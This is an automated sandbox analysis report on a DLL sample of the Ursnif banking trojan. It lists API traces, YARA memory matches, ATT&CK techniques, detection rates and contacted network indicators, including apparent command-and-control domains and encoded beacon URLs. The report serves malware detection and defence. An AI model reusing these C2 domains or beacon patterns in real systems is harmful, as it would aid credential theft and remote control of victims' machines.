                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,4_2_6F09E3AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_6F09EA21
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_6F09E84C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_6F09E0A2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303A82B cpuid 3_2_0303A82B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031172 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError,0_2_6F031172
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F08FF15 _free,_free,_free,GetTimeZoneInformation,_free,0_2_6F08FF15
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6F031825 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6F031825
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0303A82B RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,3_2_0303A82B

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596720166.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597214572.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597886088.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.689258244.000000000509D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598927334.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.642989614.000000000519B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597021606.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596902134.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598779799.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.686530956.000000000325D000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.641044169.000000000335B000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.729588115.000000000315F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597111833.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599125921.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596646171.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.598981939.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599214026.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599055381.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599169417.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.597301011.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.733741499.0000000004F9F000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.596793912.00000000034D8000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.599525991.0000000005318000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 3272, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5692, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.6f030000.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.0.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.e9a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.3.rundll32.exe.322a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4c394a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.2d094a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.d50000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.6f030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.3.rundll32.exe.2d2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.2e2a31a.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.2e1a31a.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.3030000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000003.536008305.0000000002D20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000003.513458257.0000000003220000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.492494632.0000000002E20000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.752028518.0000000004C39000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.492791250.0000000002E10000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.540888918.0000000000E90000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.749793100.0000000002D09000.00000004.00000040.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection112Virtualization/Sandbox Evasion1OS Credential DumpingSystem Time Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel11Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection112LSASS MemorySecurity Software Discovery21Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information2NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsAccount Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Owner/User Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery23Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 500299 Sample: B6VQd36tt6.dll Startdate: 11/10/2021 Architecture: WINDOWS Score: 96 42 Multi AV Scanner detection for domain / URL 2->42 44 Found malware configuration 2->44 46 Multi AV Scanner detection for submitted file 2->46 48 Yara detected  Ursnif 2->48 7 loaddll32.exe 1 2->7         started        process3 dnsIp4 36 breuranel.website 7->36 38 areuranel.website 7->38 40 9 other IPs or domains 7->40 52 Writes or reads registry keys via WMI 7->52 54 Writes registry values via WMI 7->54 11 rundll32.exe 7->11         started        14 cmd.exe 1 7->14         started        16 rundll32.exe 7->16         started        18 rundll32.exe 7->18         started        signatures5 process6 signatures7 56 System process connects to network (likely due to code injection or exploit) 11->56 58 Writes registry values via WMI 11->58 20 WerFault.exe 23 9 11->20         started        22 rundll32.exe 14->22         started        26 WerFault.exe 9 16->26         started        28 WerFault.exe 2 9 18->28         started        process8 dnsIp9 30 52.97.178.34, 443, 49781 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->30 32 52.97.178.98, 443, 49782 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 22->32 34 10 other IPs or domains 22->34 50 System process connects to network (likely due to code injection or exploit) 22->50 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      B6VQd36tt6.dll17%VirustotalBrowse
                      B6VQd36tt6.dll24%ReversingLabsWin32.Trojan.Ursnif

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.3030000.0.unpack100%AviraHEUR/AGEN.1108168Download File
                      0.2.loaddll32.exe.d50000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      areuranel.website7%VirustotalBrowse
                      breuranel.website7%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      https://areuranel.website/7%VirustotalBrowse
                      https://areuranel.website/0%Avira URL Cloudsafe
                      https://areuranel.website/liopolo/rWpAIhmksB/fMLnE1PXrqd2VqbBj/OJg6ENFLsvoK/2bIbYQZt6Yx/_2FaLr_2FAyB0%Avira URL Cloudsafe
                      https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                      https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;0%Avira URL Cloudsafe
                      https://breuranel.website/liopolo/gMrPChFga/JRICWiSmidyxIDHRRF29/nBc8QVOwWK1fs_2BdoE/a_2FMpJCzeZdSQf0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      msn.com
                      		13.82.28.61
                      		truefalse
                        		high
                        outlook.com
                        		40.97.161.50
                        		truefalse
                          		high
                          HHN-efz.ms-acdc.office.com
                          		52.98.199.194
                          		truefalse
                            		high
                            FRA-efz.ms-acdc.office.com
                            		52.98.208.66
                            		truefalse
                              		high
                              www.msn.com
                              		unknown
                              		unknownfalse
                                		high
                                www.outlook.com
                                		unknown
                                		unknownfalse
                                  		high
                                  areuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  breuranel.website
                                  		unknown
                                  		unknowntrueunknown
                                  outlook.office365.com
                                  		unknown
                                  		unknownfalse
                                    		high

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    https://www.outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jrefalse
                                      		high
                                      https://outlook.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jrefalse
                                        		high
                                        https://msn.com/mail/liopolo/Y72qNipk37Ef6u/yMdIBjS0TF0zySEk6QqaV/RM1KEI93T2ySqpPS/3a9271HiYU26bKL/CuRYvP0IHiJcR1Om5j/v_2BngoS3/PTV0r6xFeitoJIhrqq8c/AEX9VsNnHNbr2POb3_2/FNC3movbIQSikKNXB2GV0p/4fgFX9c16BwP9/WREoUF91/5ZKv3_2F1kKAcsEj_2FjVau/em3Y7wQlz5/TIVYBPW_2/FO9688N.jrefalse
                                          		high
                                          https://outlook.office365.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jrefalse
                                            		high
                                            https://outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dwubn6X7zOguR/iMUlQrL6/BThA9h9Clk92iCx0cavsxkl/4fdI4nS6Sj/yihCHX4r_2Bf1xsG_/2BUKQzRucv09/S5UJEFULHgR/sYI2tOST5SUskI/G4qeFHRMNjcHJ2CVjy9gn/wxByXeY0/co.jrefalse
                                              		high
                                              https://outlook.office365.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jrefalse
                                                		high
                                                https://www.outlook.com/signup/liopolo/wJxSKqxKoIs4hl6/RPgHanWG_2BhdmCUvh/kPMaptHHD/74uKkWxVzwFhyaQkkp7I/NkZBZMfOWiOvGyR07Yg/UdsHK_2BhDWC9S_2Bq5qwQ/tic9OPnwrqPJ8/sBs9ep3g/eQ_2FbCMldJx8QkchMeY_2F/9VT2Y68DG0/T_2Fo8PaFlf7e2wiH/yMWBWkxn2yOC/D8kmhJaVYSvP5/Yp7bf.jrefalse
                                                  		high

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://msn.com/#loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://www.msn.com/?refurl=%2fmail%2fliopolo%2fY72qNipk37Ef6u%2fyMdIBjS0TF0zySEk6QqaV%2fRM1KEI93T2yrundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                      		high
                                                      https://www.msn.com/.loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://areuranel.website/loaddll32.exe, 00000000.00000002.747869464.0000000000E32000.00000004.00000020.sdmptrue
                                                        • 7%, Virustotal, Browse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;aloaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                          		high
                                                          https://areuranel.website/liopolo/rWpAIhmksB/fMLnE1PXrqd2VqbBj/OJg6ENFLsvoK/2bIbYQZt6Yx/_2FaLr_2FAyBloaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmptrue
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://blogs.msn.com/loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.598864684.0000000005318000.00000004.00000040.sdmp, rundll32.exe, 00000003.00000003.599253320.000000000531D000.00000004.00000040.sdmpfalse
                                                            		high
                                                            https://deff.nelreports.net/api/report?cat=msnloaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599602705.000000000531B000.00000004.00000040.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.msn.com/en-us//api/modules/fetch&quot;loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                              		high
                                                              https://www.msn.com/loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://ogp.me/ns/fb#loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597601691.0000000000E65000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                                  		high
                                                                  https://outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2FadD/dloaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    https://msn.com/loaddll32.exe, 00000000.00000003.628949223.0000000000DF3000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      https://outlook.office365.com/loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpfalse
                                                                        		high
                                                                        https://mem.gfx.ms/meversion/?partner=msn&amp;market=en-us&quot;loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597397384.0000000000E66000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.outlook.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNsX_2Faloaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          http://ogp.me/ns#loaddll32.exe, 00000000.00000003.597703077.0000000003459000.00000004.00000040.sdmp, loaddll32.exe, 00000000.00000003.597601691.0000000000E65000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, rundll32.exe, 00000003.00000003.599440417.0000000005299000.00000004.00000040.sdmpfalse
                                                                            		high
                                                                            https://outlook.office365.com/signup/liopolo/jxoib0nr0xisi2eIVGGk/Kbu0JPj_2B3fu4js1D7/jxotlkFcz1f8cNloaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmp, loaddll32.exe, 00000000.00000003.696404681.0000000000DF1000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              https://www.outlook.comloaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpfalse
                                                                                		high
                                                                                https://breuranel.website/liopolo/gMrPChFga/JRICWiSmidyxIDHRRF29/nBc8QVOwWK1fs_2BdoE/a_2FMpJCzeZdSQfloaddll32.exe, 00000000.00000002.747507339.0000000000DF1000.00000004.00000020.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown

                                                                                Contacted IPs

                                                                                • No. of IPs < 25%
                                                                                • 25% < No. of IPs < 50%
                                                                                • 50% < No. of IPs < 75%
                                                                                • 75% < No. of IPs

                                                                                Public

                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                52.98.199.194
                                                                                		HHN-efz.ms-acdc.office.comUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                52.98.208.66
                                                                                		FRA-efz.ms-acdc.office.comUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                52.97.178.34
                                                                                		unknownUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                52.97.178.98
                                                                                		unknownUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                                                40.97.161.50
                                                                                		outlook.comUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                13.82.28.61
                                                                                		msn.comUnited States
                                                                                		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse

                                                                                General Information

                                                                                Joe Sandbox Version:33.0.0 White Diamond
                                                                                Analysis ID:500299
                                                                                Start date:11.10.2021
                                                                                Start time:22:32:39
                                                                                Joe Sandbox Product:CloudBasic
                                                                                Overall analysis duration:0h 11m 16s
                                                                                Hypervisor based Inspection enabled:false
                                                                                Report type:full
                                                                                Sample file name:B6VQd36tt6.dll
                                                                                Cookbook file name:default.jbs
